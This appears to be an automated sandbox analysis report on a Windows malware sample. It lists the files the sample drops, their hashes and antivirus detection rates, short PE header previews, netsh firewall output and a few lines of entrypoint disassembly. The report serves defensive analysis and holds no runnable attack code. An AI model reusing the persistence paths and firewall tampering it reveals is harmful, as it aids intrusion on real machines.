                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: Metadefender, Detection: 37%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 84%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^`.....D...D...D.ScD3..D.SrD...D.SdDf..D=.D...D...D...D.SmD...D.SsD...D.SvD...DRich...D........PE..L...l_.`......................{...................@..........................P|................................................<....P{..............................................................|..@............................................text............................... ..`.rdata.............................@..@.data.....s..........~..............@....rsrc........P{.....................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\A7DB.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):752128
                                                                                                                                  Entropy (8bit):7.235022431975566
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:3WRxXhNF7PqC3t3agQ1DKoYf7Bz6q3MS0jLTESBr6MrIWc8unn:3WRZPJqq3aFtvYf7R6q3AB+Iu/
                                                                                                                                  MD5:C388DB9CA136D19310B76EF81E54FC12
                                                                                                                                  SHA1:EDCC614B7A82D45ABCD7CF6A4A320E96EBF74194
                                                                                                                                  SHA-256:BCDCAF81B3D7D4434C2A0CAF687317A8B641D0A7F6B32A9130E4CCBF289D2EB6
                                                                                                                                  SHA-512:C7C381654AEA4F294F44FB3D889CC633D03B9BA925BD0F570DE35E3A5F051720D178CF87C0B11EE722BB144CF6C61419BFEC4F4DF64ADC8076BFDE01B69EF07B
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L...,3R`.....................................0....@.................................JU.......................................]..P....0..P............................1...............................P..@............0...............................text...#........................... ..`.rdata..b7...0...8..................@..@.data...8....p...X...T..............@....rsrc...P]...0......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\BD87.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):615936
                                                                                                                                  Entropy (8bit):6.41244177881293
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:fILn6MEfztqUnUxs9iIoDyJRj86dMDexWcAch4tUTc6SDhVqkJZ9:fcJEhqW6UiIouJRj8qMDeccFh4ec7h4a
                                                                                                                                  MD5:7FE15A5F306240209441F528BE0F5783
                                                                                                                                  SHA1:8B346B7E81859D79EB29CF9C6B7FDA7C1A80D85E
                                                                                                                                  SHA-256:0C96D2A002820008CD17AAFBE1806A31EFDB3D37D5B2E6731C3AD8DDD4576812
                                                                                                                                  SHA-512:8AC50266684DF2D56BBAFB645E9B1C292E043C3F35AD59266F41C14DBCEEBAE20ADC72A7F8726D6C0074CB12D3CF9D4A3DBB6AD18212D6CAEC35742C94FF706B
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>X.$z9.wz9.wz9.wnR.vw9.wnR.v.9.wnR.vl9.w(L.vk9.w(L.vn9.w(L.v09.wnR.v.9.wz9.w.9.w.L.v{9.w.L.w{9.w.L.v{9.wRichz9.w........................PE..L...}..a.............................j............@.......................................@....................................<...............................t......................................@...............X............................text...C........................... ..`.7m512qw.....0...................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc..t............H..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\C71D.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:MS-DOS executable
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1335968
                                                                                                                                  Entropy (8bit):6.778646938974583
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:N4U4W7eu98+Xl4U4APyIrgyBc1mb8FyV30JBOTfGdHOoT1VP9SLyJPdQSgyR5daq:7P98+IIrgyv8Fs3UQyHRT1V8yJ1n
                                                                                                                                  MD5:DC36EBFC2796806A965589566C81E2A1
                                                                                                                                  SHA1:787EBB01105FF61A080631C977ACB05D94A021A7
                                                                                                                                  SHA-256:2B3DF46D7DD8E09722E98CF695137DDEDDE0BED7C32BE8A5495E915A5C24B3A4
                                                                                                                                  SHA-512:D5607CF8FA2AB926FE88FE09C11B8111003DEE3AC23F8D504A5FE5E326E91C743BA6618D34860536CC32E7541ED172C841C34C8567D68B865833593A803387AC
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L.....)...............0......d........... ... ....@..........................`............@..................................@.......P...a...........................................................................................................rdata...0.............................`.reloc.......@......................@....rsrc....a...P...a..................@..@.edata...............h..............@.......................................................................................................................................................................................................................................................................................................................!..g.Q7f.Qw.ZY*A..l..Hl.~.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\D78A.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3654656
                                                                                                                                  Entropy (8bit):7.997678478399616
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:98304:TePwBYAtDcHV3jEZajoMeWGJd+oe2hrmLvVb0YXBprQ:TeP0YAkjq8idF/ZmLvl0YXBprQ
                                                                                                                                  MD5:DDE4AEC3401693065A0077916DE74099
                                                                                                                                  SHA1:7FC52C12FA4C8ADF3611711EA60E2BBC73360735
                                                                                                                                  SHA-256:92E2ED96AF477AD54ED852F34FD4A8B9BCA39F7D126CEBDE7E12EFEE8B890F59
                                                                                                                                  SHA-512:4EDEB366FF5BD9D7BD187587A5CA015A80A46A54FAE470F6489697F33286861EE8E26E423E1B3747654382DB9592F987F74475C1E6A0E6AA431A5275C0AE2B24
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..a..........................................@...........................].......8.....................................|.Y. ....pW...................................................................................................................... ..........................@................0......................@...........r...........................@.......................................@...........\...........................@.............3...#..f0.................@....rsrc........pW......|1.............@....x3Kvu4C......Y.......3.............@....adata........].......7.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\E3A0.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:MS-DOS executable
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1862216
                                                                                                                                  Entropy (8bit):7.967695175871448
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:eaQUQj0aLF3dVB+opb5H+1m1ZsV0yw3BNNMbRf7N:TZyR3dVB+op5Try0LCF7N
                                                                                                                                  MD5:152EA6FCB5DA38701C49AC77522C3FD4
                                                                                                                                  SHA1:A7177BEE68BDD28CE65840E9057D3CB21A078C08
                                                                                                                                  SHA-256:6D04EA83251F3206BFE3CF4A33D803792BEC2496DB275801ECB53E486BD0FE9E
                                                                                                                                  SHA-512:610BA8D994735FC1039F441479C9A66AC16C610CB43ED9DC2F76AA0B7A20FD16C9C256E4A23BE365673464A1FA8774FDD0BF2B52DF6FE7840602275620FF8659
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....2.a.....................z....................@.................................[........................................P..d....`..............Q...............................................................................................idata...@.............................`.text........P......................@....rsrc.......`.....................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................+.SU........h.I.f....,4.....7
                                                                                                                                  C:\Users\user\AppData\Local\Temp\qflfaqod.exe
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\12CC.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):11636736
                                                                                                                                  Entropy (8bit):6.324227250612706
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:wBowVnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn:47
                                                                                                                                  MD5:D87304ADE23471353A7A95FEF9256AC6
                                                                                                                                  SHA1:255F3A2E9ED8BC93C0C5CFBFADAA682F88E48032
                                                                                                                                  SHA-256:143DCEC1795643689FD1E8C05E6426E0FDC1D13EA9DBFAC2C95A8AA9787C167E
                                                                                                                                  SHA-512:A09901438B4D77839D42656F29B83A45B82F283F921E40651522969F5B5200F05A6FCC734C13252D590BA81E2D892943F54E13AFBB3193142488356863E930E9
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L......_............................./.......0....@.........................................................................8^..P....@..P............................1...............................Q..@............0...............................text...S........................... ..`.rdata...7...0...8..................@..@.data...x....p...l...T..............@....rsrc...P....@.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\eugcwgv
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):285696
                                                                                                                                  Entropy (8bit):5.04280913906182
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:74aUfB9HX64t9b47ZgNaZ330yPTk40f6rzCRYaEfF8Wrxpzbgqru:0LfWcZBS3dPTkrgKYaluzbgwu
                                                                                                                                  MD5:31A601A28F4A81A69C9B09D7249582B9
                                                                                                                                  SHA1:7AA415965720F2C794FD44A4F147DD7FA756B9B8
                                                                                                                                  SHA-256:4A74DBAAACB20B26D7237B74CED5BD105B0FF3E2EB3ECE3EBA7BB93BF224B853
                                                                                                                                  SHA-512:8D5D50B13BD9358C98252B706DA4E4031D1BFCEF8C723131F3F056130465167B36523EE680CA4A281EA90ADB0B31D88DF13C744E7A0C7D86D39F0F08E47E939A
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......dZ.@ ;.. ;.. ;..>i+.7;..>i=..;..>i:..;......';.. ;...;..>i4.!;..>i*.!;..>i/.!;..Rich ;..........PE..L...._.`............................./.......0....@..........................................................................]..P....................................2...............................P..@............0...............................text...#........................... ..`.rdata..v7...0...8..................@..@.data...X....p..."...T..............@....rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Roaming\eugcwgv:Zone.Identifier
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):26
                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                  Malicious:true
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):55
                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):7250
                                                                                                                                  Entropy (8bit):3.166400896445558
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTE+3+Ab/t:cY+38+DJc+iGr+MZ+65+6tg+ECH3+ct
                                                                                                                                  MD5:E522F736A10AA76566B88A8D6D50143E
                                                                                                                                  SHA1:0FC74C868359E206896AF3818ABFC231734CA3C7
                                                                                                                                  SHA-256:8B8E053D176ACC3F69C3154827A0E0F23D348B9FFF8D9D2D80D4C6A6190313DE
                                                                                                                                  SHA-512:DC241BBD7E18D6622D9617FF3AC1EBC7B3A4063714141A3C3B28B73E8BCE5369A2AD9A463172F5B533E2D6A9FE22FCB37BA3C54BBF84AAD29E204FF2AE43C592
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220112_073734_069.etl
                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8192
                                                                                                                                  Entropy (8bit):3.322261023838909
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:MCNC1go+A/5pD9Y/YpVCPCI2lIfkDc4j+T2DjFzzNMC3JdJRW:nf0+h52ipPC3Nw
                                                                                                                                  MD5:9F26F64FA15EA5F5B109E8E368370BCA
                                                                                                                                  SHA1:8BACE0BBC35CB8BA4EF7F32E0DE84595C66B7ED9
                                                                                                                                  SHA-256:C6077E337EFF1B9690D3D3A4F5DE98ED62D22886DFD438420E331B78725DA469
                                                                                                                                  SHA-512:6085DB21877A302C31F2BDAFF96BDE35E4D2FC5C29B33ED0AEACA76ADFD4D577DBA860535ABBDCDBCAA44EC0FE1ABBACF62FD2B39776AFD05DBAEF5435EC9857
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: .... ... ....................................... ...!............................................................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .......vC............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.2._.0.7.3.7.3.4._.0.6.9...e.t.l.........P.P.................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe (copy)
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):11636736
                                                                                                                                  Entropy (8bit):6.324227250612706
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:wBowVnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn:47
                                                                                                                                  MD5:D87304ADE23471353A7A95FEF9256AC6
                                                                                                                                  SHA1:255F3A2E9ED8BC93C0C5CFBFADAA682F88E48032
                                                                                                                                  SHA-256:143DCEC1795643689FD1E8C05E6426E0FDC1D13EA9DBFAC2C95A8AA9787C167E
                                                                                                                                  SHA-512:A09901438B4D77839D42656F29B83A45B82F283F921E40651522969F5B5200F05A6FCC734C13252D590BA81E2D892943F54E13AFBB3193142488356863E930E9
                                                                                                                                  Malicious:true
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L......_............................./.......0....@.........................................................................8^..P....@..P............................1...............................Q..@............0...............................text...S........................... ..`.rdata...7...0...8..................@..@.data...x....p...l...T..............@....rsrc...P....@.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1572864
                                                                                                                                  Entropy (8bit):4.269326832537326
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:Tfda9SQijKmCv2gmkweRpH5PFOD5bfmUaUdX9UvewFxvSINUUiD4oRSRg:rda9SQijKmCv2gmQheYRg
                                                                                                                                  MD5:AA493C6FFEFB8D9F4FAF2BC7F6757D9D
                                                                                                                                  SHA1:335766032A7000F855DEDBAC6AF9AD87F7FEF674
                                                                                                                                  SHA-256:31DF3F8D32DC48FDDB9B75EF60B70D531978E3A3C53FBFC9538C58DD3E9933C4
                                                                                                                                  SHA-512:0D1AEC107F1FD534899CDDA05A27A1AF8A66B36D66F8CFD67B088B006C8FC291052107DB43987C40671BD9A00DF3AE5E1B7D0D6A1E6FFCDBE0ED2C3CE6116A1A
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: regfR...R...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..[.................................................................................................................................................................................................................................................................................................................................................T..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):49152
                                                                                                                                  Entropy (8bit):2.6427266548071273
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:AE0qfFAf2oGxwpHm1y0UuKWmGM9TVNNsVC9/WDdh8:asFYzWjDA
                                                                                                                                  MD5:DEA2A26A03E58CC6510FEE4F20D3D68C
                                                                                                                                  SHA1:EC5E20401CDE67E45AA9B268B691308694273EFD
                                                                                                                                  SHA-256:B362C23ABE23CF45611F3A59E37C8A2244911C3579E0043ED8FAEA7E5D10A515
                                                                                                                                  SHA-512:E13C8A0F6A5056E6806E407EBE2A4D8D8B9FDE88FC9391C960B8E0340102586E25408D609792FBB4164703C784610CFFF6E93829760D0B787372834E8E29645A
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..[.................................................................................................................................................................................................................................................................................................................................................T..HvLE.n......Q............t..:...S...^..................................... ..hbin................p.\..,..........nk,.sC.[.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .sC.[........ ...........P............... .......Z.......................Root........lf......Root....nk .sC.[.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissions
                                                                                                                                  \Device\ConDrv
                                                                                                                                  Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3773
                                                                                                                                  Entropy (8bit):4.7109073551842435
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                  MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                  SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                  SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                  SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):5.04280913906182
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:NNOKmCIVoi.exe
                                                                                                                                  File size:285696
                                                                                                                                  MD5:31a601a28f4a81a69c9b09d7249582b9
                                                                                                                                  SHA1:7aa415965720f2c794fd44a4f147dd7fa756b9b8
                                                                                                                                  SHA256:4a74dbaaacb20b26d7237b74ced5bd105b0ff3e2eb3ece3eba7bb93bf224b853
                                                                                                                                  SHA512:8d5d50b13bd9358c98252b706da4e4031d1bfcef8c723131f3f056130465167b36523ee680ca4a281ea90adb0b31d88df13c744e7a0c7d86d39f0f08e47e939a
                                                                                                                                  SSDEEP:3072:74aUfB9HX64t9b47ZgNaZ330yPTk40f6rzCRYaEfF8Wrxpzbgqru:0LfWcZBS3dPTkrgKYaluzbgwu
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......dZ.@ ;.. ;.. ;..>i+.7;..>i=..;..>i:..;......';.. ;...;..>i4.!;..>i*.!;..>i/.!;..Rich ;..........PE..L...._.`...................

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:acfc36b6b694c6e2

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x402fc7
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x60A05F0C [Sat May 15 23:53:48 2021 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:22d83eb8d57dfc503864047e3c9d375e

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  call 00007FFBD09C1DCFh
                                                                                                                                  jmp 00007FFBD09BC38Dh
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  int3
                                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                                  test ecx, 00000003h
                                                                                                                                  je 00007FFBD09BC536h
                                                                                                                                  mov al, byte ptr [ecx]
                                                                                                                                  add ecx, 01h
                                                                                                                                  test al, al
                                                                                                                                  je 00007FFBD09BC560h
                                                                                                                                  test ecx, 00000003h
                                                                                                                                  jne 00007FFBD09BC501h
                                                                                                                                  add eax, 00000000h
                                                                                                                                  lea esp, dword ptr [esp+00000000h]
                                                                                                                                  lea esp, dword ptr [esp+00000000h]
                                                                                                                                  mov eax, dword ptr [ecx]
                                                                                                                                  mov edx, 7EFEFEFFh
                                                                                                                                  add edx, eax
                                                                                                                                  xor eax, FFFFFFFFh
                                                                                                                                  xor eax, edx
                                                                                                                                  add ecx, 04h
                                                                                                                                  test eax, 81010100h
                                                                                                                                  je 00007FFBD09BC4FAh
                                                                                                                                  mov eax, dword ptr [ecx-04h]
                                                                                                                                  test al, al
                                                                                                                                  je 00007FFBD09BC544h
                                                                                                                                  test ah, ah
                                                                                                                                  je 00007FFBD09BC536h
                                                                                                                                  test eax, 00FF0000h
